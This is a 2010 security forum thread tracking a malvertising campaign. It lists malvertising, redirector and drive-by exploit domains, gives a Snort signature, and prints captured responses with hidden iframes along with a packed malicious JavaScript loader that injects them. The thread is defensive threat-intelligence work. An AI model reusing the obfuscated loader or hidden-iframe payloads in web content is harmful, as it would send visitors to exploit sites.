Author Topic: adnet.media.*.com domains - NEW TITLE  (Read 46486 times)

0 Members and 1 Guest are viewing this topic.

June 25, 2010, 06:12:03 pm
Reply #45

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Domains recap for the last few weeks.

Malvertising Domains (Serve up Obfuscated JavaScript that redirects to check-in sites):

a123.g.doxoni.com
a123.g.honettee.com
a123.g.manilis.com
a123.g.ophori.com
a123.g.rogloard.com
ad.doubleclick.net.leastive.com
ad.doubleclick.net.mattoft.com
ad.doubleclick.net.wifell.com
ad.view.expiage.com
adnet.media.intati.com
epholo.com
h7.ch.adtech.com.niklip.com
mattoft.com
media.fastclick.net.tribudd.com
media.fastclick.net.wifell.com
media.mattoft.com
media.rseeting.com
media.torpalis.com
rismit.com
sconect.com
view.atdmt.com.cidersi.com
view.atdmt.com.daxitymb.com
view.atdmt.com.landsm.com
view.j9.atlassolutions.com.xbevs.com



Check-in sites that redirect to SEO Exploit drive by sites:

canteeve.com
deltastats0.co.cc
dmset.co.cc
fastclick01.co.cc
generalline.co.cc
generalline.co.cc
getazxvision.co.cc
globalmicro.co.cc
hlrotio.co.cc
jahsgdqtuz.co.cc
linestreams.co.cc
mediaclickz.co.cc
mediafasts.co.cc
microjet.co.cc
microtrendsa.co.cc
neoplezas.co.cc
neotrapis.co.cc
orionst11.co.cc
securetrend.co.cc
sigmapopts.co.cc
statstoplex.co.cc
stcorp-as.co.cc
totaltrends.co.cc
weatherspacex.co.cc
webcharterw.co.cc
webclickst.co.cc


SEO Exploit drive by sites:

aiosstatsungenett.com
bumzc.com
chiklomba.com
fjoty.com
fnmaw.com
fruuf.com
ghutren.com
google.analytics.com.xygppovpmbh.info
google.analytics.com.qapvjonkksh.info
hjoty.com
kirtunmil.com
ljutrum.com
palcaug.com  
potyur.com  
preteritness.com
qtulina.com
retykub.com
sertgukl.com
statsianighteworkes.com
potyur.com
tjerhan.com
ttyur.com
unastatiomask.com
uoptyr.com  
uprtx.com
www.obsidallynd.com


Domains referring clients to the malicious advertising services:
Code: [Select]
1077theend.com
1077thelake.com
3rdnewhampshire.webs.com
.997kiss.com
997kiss.com
a123.g.honettee.com
a123.g.rogloard.com
actionsportsblips.dailyradar.com
ad.ca.doubleclick.net
ad.doubleclick.net
ad.wikinvest.com
aetv.com
a.farlex.com
amertribes.proboards.com
angelmariem.webs.com
anorak.co.uk
arts.nationalpost.com
ashraf786.proboards.com
associatedcontent.com
audioreview.com
ballhype.com
bdv.bidvertiser.com
bemidjitakeakidfishing.webs.com
biography.com
calgaryherald.com
canada.com
cantonveterinaryhospital.webs.com
carnivoraforum.com
carreview.com
cheaptickets.com
classifieds.mtbr.com
classifieds.outdoorreview.com
combineforums.proboards.com
community.history.com
content.mtbr.com
countryblips.dailyradar.com
courses.golfreview.com
crosstieentertainment.webs.com
dailymail.co.uk
dailyradar.com
daysblips.dailyradar.com
designsbyanna.webs.com
detroit4lyfe.com
dreamriverstables.webs.com
dynamic.nasdaq.com
eagleridgervpark.webs.com
earthblips.dailyradar.com
edmontonjournal.com
faceoff.com
financialpost.com
fixya.com
forums.golfreview.com
forums.mtbr.com
forums.outdoorreview.com
forums.roadbikereview.com
froggy101.com
gallery.mtbr.com
gallery.photographyreview.com
gallery.roadbikereview.com
garagejournal.com
geekblips.dailyradar.com
.glam.com
golfreview.com
google.com
gscnccampstaffalumni.webs.com
habsinsideout.com
hair2dye4salon.com
history.com
hodagbassmasters.webs.com
hotfrog.com
ibiker.proboards.com
idiomproductions.webs.com
intellicast.com
kmbz.com
kossan.se
lablips.dailyradar.com
life.nationalpost.com
live.nationalpost.com
lolblips.dailyradar.com
lovingrats.webs.com
manitoudays.webs.com
maximumitblips.dailyradar.com
mediablips.dailyradar.com
members.webs.com
mentalfloss.com
mhsfashion.webs.com
missblackinternational.webs.com
mommyblips.com
montrealgazette.com
movieblips.dailyradar.com
mtbr.com
musicblips.dailyradar.com
n.admagnet.net
naruto-manga-spoiler.com
nasdaq.com
newrock933.com
news.nationalpost.com
newyorkblips.dailyradar.com
orbitz.com
outdoorreview.com
pchardwareblips.dailyradar.com
pgproductionsvocalstudio.webs.com
photoblips.dailyradar.com
photographyreview.com
plugins.wikinvest.com
pnta.proboards.com
process.advertangel.com
quotes.nasdaq.com
rapturefightclan.webs.com
reviews.carreview.com
reviews.mtbr.com
reviews.photographyreview.com
reviews.roadbikereview.com
revolverblips.dailyradar.com
rlslog.net
roadbikereview.com
scienceblips.dailyradar.com
showhype.com
shrinkingjeans.net
slacker.com
slitherbriggs.webs.com
soft-4all.com
sportsfanlive.com
sports.nationalpost.com
starzband.webs.com
svc1.m5prod.net
syndication.adagora.com
tampaspinsweather.webs.com
tennessean.com
theofficeblips.dailyradar.com
thesky973.com
thestarphoenix.com
throttleblips.dailyradar.com
timeaftertimeonlinedrama.webs.com
timescolonist.com
trails.mtbr.com
tvblips.dailyradar.com
usatoday.com
vancouversun.com
waitingfornextyear.com
wallstreetblips.dailyradar.com
webcache.googleusercontent.com
webs.com
wgr550.com
windsorstar.com
worldofsnails.webs.com
wrestlingblips.dailyradar.com
wrko.com
wwl.com

June 25, 2010, 08:13:20 pm
Reply #46

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
This Snort sig helps tracking the new drive by domains quite effectively:

Code: [Select]
alert TCP $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING hidden iframe served by ngix"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"<iframe src="; content:"style=\"visibility\:hidden\;\" width=\"1\" height=\"1\"></iframe>"; classtype:bad-unknown; sid:5600049; rev:1;)
Server response signature was developed from:

Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 24 Jun 2010 00:35:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 137

<html>
<body>
<iframe src="http://fjoty.com/pw/za_pumsvx.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>

False positives have been non-existant so far for the past few hours.

June 28, 2010, 04:54:58 pm
Reply #47

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Malvertising Servers:
view.atdmt.com.requild.com

Check-in/Redirectors:
trendanalytics2010.co.cc
vcztuokghrtq.co.cc

New drive-bys (change/rotate every 24 hours or so):
http://uytim.com/vz/tbbncwdv_.php - Saturday
http://kobqq.com/vc/vcc_vdz.php - Sunday
http://yopte.com/zs/bzkvfl.php - Monday (Today)
http://yopte.com/wb/adbplhr.php

More info:
Drive bys are single shot based on source IP (then they redirect to google.com on subsequent visits, even after a domain name change). Also, the JavaScript is broken and will not execute in IE8 unless you are using compatibility mode.

June 28, 2010, 08:31:37 pm
Reply #48

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Nice catch :)

/edit

Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)

/edit 2

And this one please;

view.atdmt.com.requild.com
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 29, 2010, 03:07:44 pm
Reply #49

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Yes indeed, here ya go.

Nice catch :)

/edit

Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)

URL:  http://vcztuokghrtq.co.cc/north.php?n=cust12
Referrer: http://www.fixya.com/support/p1133609-orange_steelcore_9_surfboard_lock_snowb

Response:

Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 27 Jun 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 135
<html>
<body>

<iframe src="http://kobqq.com/vc/vcc_vdz.php" style="visibility:hidden;" width="1" height="1"></iframe>

</body>
</html>



Quote
And this one please;

view.atdmt.com.requild.com

URL: http://view.atdmt.com.requild.com/MON/jview/dlnkkmgr124536131mon/direct/01/?rn=11386816&click=
Referrer: http://mac.softpedia.com/get/Math-Scientific/Best-Pair-II.shtml

June 29, 2010, 03:12:49 pm
Reply #50

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
New stuff for today:

Malvertising:
http://js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc

Redirect:
http://globalsearch5.co.cc/amiga.php?n=cust12

Exploit:
http://nhytx.com/wt/_duusz.php

June 29, 2010, 06:16:27 pm
Reply #51

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 29, 2010, 06:19:25 pm
Reply #52

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Do I need a special referer for

Code: [Select]
js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc
??

Script decodes to
Code: [Select]
<a href='http://www.raffaello-network.com/' target='_blank'><img src='http://js.zedo.com.rc1.hiskweb.com/banners/load.php?id=223417424' border='0' ></a>
Do you find more ?
Ruining the bad guy's day

June 29, 2010, 08:20:03 pm
Reply #53

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
The obfuscated code I have from pcap from the js.zedo.com.rc1.hiskweb.com is as follows:

Code: [Select]
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|14278a4166c9380ac458311916360d320202bb86b930868de0fab1f2103f8062e6100a30868de0fab1f2103f8062e6100a1e1722c12cfabc32bd5671aa08a72014a7f23058af0444a601b9232800f0a0012f9519324b1471b9232800f0a00288d4cd324b1471971cdf196c8d51926ae031d1e0e34408e81aa42311926ae031d1e0e34408e81aa42311926ae031d1e0e34408e82e01ebe13b5b8921e59ff0c262410dad1c80197aa509dbe6215669ff17a560e2d1f91900625f80d2722717a560e039bb3c00625f825ae78e0e13cb21258e1404e379f10fe89712c00862dc720527c717d02c034f1470e7d06ecd6c1d6e1030d27227197cbeb0fab1f2103f8062e6100a30868de0fab1f2103f8062e6100a1e1722c12cfabc32bd5671aa08a72014a7f23058af0444a601b9232800f0a0012f9519324b1471b9232800f0a00288d4cd324b1472b22812298e48c1abe7fc1c31a481b8dd2524ae18d243aa620eaad043228f2b12c008633e1bc207989712cfa53c1aef996244ecc4004e3291971cdf1dc7bc427b39b72428cd33120e0c0a4ccea0b6abce07781090e5ea6a113ccd41b8b2753056d4b2f823b31418a04276339c34708480723be72e071d33103e701bb42351191e681bf36e21ba9ced11cc9ee2fb918b1db51eb15c7ea72d0cd8413178ce08b7e312efa6e928d72fb1fe79532aabf0814bf52e039357c34408e817f76b20f0fc26156a41018b7aac07b87481f9389c034249a0651f4a0221107042916b26e5abc1aa08a70104be22b2804008c51d217f6eaf2ef39b507c89d621041a700a07af24d338c0c618e123333eb1eaf87c0c9208524d564b200c89720ca440299b66519b25fc2a43a6021aa5ca2bf802405076a109f4cb11205da01e1443e0a03dcb2a3e93d1fc5db5271ccf9139dc3d28188b509fcf13127045b1a75ea029a682e1fd7ae906d11191075ecd28d72fb0e0ead72cf1040037ad36149210d2216a20351d2a01fd00c00210f432d9526533aaed8318bbad250603f105cc50023fef533fc80f2f13b5a2bd059c2bdac3d27a2d5d0f81d15047a6f40a96fe62c17b38250603f048cb38155aa5420e72c1306b9af104c3fe1cb244b1c5b357296b80e126c9e90a3d4bf1d441f21b735cd2f503d60728f5d26560f01d6d73a281d73c2761a8b160ebd50c1b0b701e29692953b551afbffc28c8c71338fdbb1e9d32b032ba711871ce2097a8c11c4ae441ffa2ee200e857240653a053497f1319db11eed7d32cfa53c1ec4bb0159d30830a91b90b6b4a9003e5382da7583252207b0a739100154a0f0ab92322c7d80504ef3430c7559401824f909a5b53089b47c0f839fe10a67e50cca16601b98b40f682d12ca3b7a32dd3e92b18a2e21af0391dc410c07a89c2330ae0a1f859e30ecd77d039357c17c06041e223e224c88df16ebeec01f36c21832aca1a1bf831c750f83243dab10224cc1213b192af495002b3dd832b5c500eb558017d0901265d6a42bf802420e72c120b05220d0e7d01c9f39f1e33b392b2bc4b197d4b433dfa9a2ac25092be16141610f3518026cf16f9a32136829f2ee53d129b255f20de0c30141d0c2e6100a234293d16a743a22a72a92f171c331d29f91e33b3912d66721bc1c621d4e6b909510b233592100709a1d19e1a2a0659cd72200785349135f317b72a113a30829a682e084b0af24eb2261aec0c125b2b5909c6c6404ba64a0c864b312c5e1b18165871081ac90cfb6380c640d82c2c39f2392b342d20f892420fe2217c9a306298f114ce3960d3c68d01f175f2f558592a6c7c226e045321252ec05124cd2d3783620d9f461ec13152779a4a1c7680f222522901f175f1fe6684191bb5a296b80e0abb7f423d8c4c09e812d112f6ca2ebea001a117e413d302c1b3e3c41fd00c02be03ee127e0d2020c8430a53352137d7b21f55e2b347c220152ff8613774d6032ba711871ce2097a8c11c4ae441ffa2ee200e857240653a053497f1319db11eed7d32cfa53c1ec4bb0205d17822d15782bc2b9907d51d603aeb8820823ec2c8aafa2948ca918a700b0c859be096c52804263a32e20d2804012ab06a124908afab7299a8ba2ea0ec91e2528d115dcd107f9c7f33b6cc801f175f172f5ce12cfabc040c00e04ad1711d2a69b12a53152f34e2d281d73c1ec4bb00f5d6ba2d982a41bbb17621659d81c5b3571d88ad931954b71add61e1cea70a06591061c0c8821cf8ea2010d47d23db96b21424b4210dda62e4dbf106cc8b51fc5db502ba6f82b7d5b21aaa55f1cfeb090ac92603111ffd2eb7cd217abdb32be03ee044c1a6018269021c777f2123c2022e2f411e6a3a923ed37220002801792714306b9af0d0e7d01c9f39f1e33b3934941e00a53352137d7b21f55e2b347c2202421be3|Math|floor|break|splice|29819039|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|55721041|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))

This causes two hidden iframes. The first to the trendanalytics2010.co.cc leads you to the drive by, the second just keeps stats/tabs on clients hitting the malvertising domains:

Code: [Select]
<iframe width="1" height="1" style="visibility: hidden;" src="http://trendanalytics2010.co.cc/colombo.php?n=cust1">
<iframe width="1" height="1" style="visibility: hidden;" src="http://js.zedo.com.rc1.hiskweb.com/stats_js_e.php?id=223417424">

**EDIT**

I uploaded the sample I posted to JSUnpack and it validates it. The report is as below:
http://jsunpack.jeek.org/dec/go?report=8442c03b07e2de6a49068fb3e5b1d1ae9bf7e3fa

July 01, 2010, 05:40:38 pm
Reply #54

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Drive By:
http://hkuos.com/vd/ncdka.php - Yesterday
http://polkj.com/ch/jqpqzlq.php - Today

Redirectors:
http://ailerry.co.cc/kleopatra.php?n=cust12 - Yesterday
http://almodial.co.cc/gtrsp.php?n=cust12 - Today

July 02, 2010, 05:42:56 pm
Reply #55

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Drive By:
http://qxitr.com/fv/_hsj.php

Redirectors:
http://chelleak.co.cc/gtrsp.php?n=cust12

July 06, 2010, 08:32:19 pm
Reply #56

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Seeing some stuff move into a new netblock recently:

89.248.174.0/23

Malvertising servers:
view.atdmt.com.risoton.com - jsunpack report here
view.ads.cheratic.com
view.atdmt.com.tessane.com


Redirector:
http://benzele.co.cc/jakomo.php?n=cust1

The driveby/exploit domains remain within the 194.8.250.0/24 netblock.

July 06, 2010, 09:01:09 pm
Reply #57

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
More domains active in the malvertising netblock:

media.fastclick.net.timoton.com

Haven't seen the hidden iframes inside of this obfuscated javascript, it will probably be switched on at later date given the netblock it lives in. Also MSN/Live.com are currently using this advertising service.

**EDIT**
And its already swapped over to redirecting to drivebys:
http://jsunpack.jeek.org/dec/go?report=8f1e9fa5b9651e1fdb135997cd15f0d8ec42a014

http://mildron.co.cc/jiqasdir.php?n=cust11
http://jgtee.com/ww/wnuajoz.php

July 13, 2010, 10:19:00 pm
Reply #58

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
URL's are changing up slightly today:

http://statpc.in/x/?src=sftmaster2&id=av1&o=o

Net has moved for the drive by's as well, to another already known bad actor:

91.188.59.55
http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.188.59.55

Differnt driveby style site as well, this is more of a scanner page.

July 14, 2010, 05:24:58 pm
Reply #59

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179

http://tosoft.in/x/?src=sftmaster2&id=av5&o=o
http://resolvenews.in/x/?src=sftmaster2&id=av5&o=o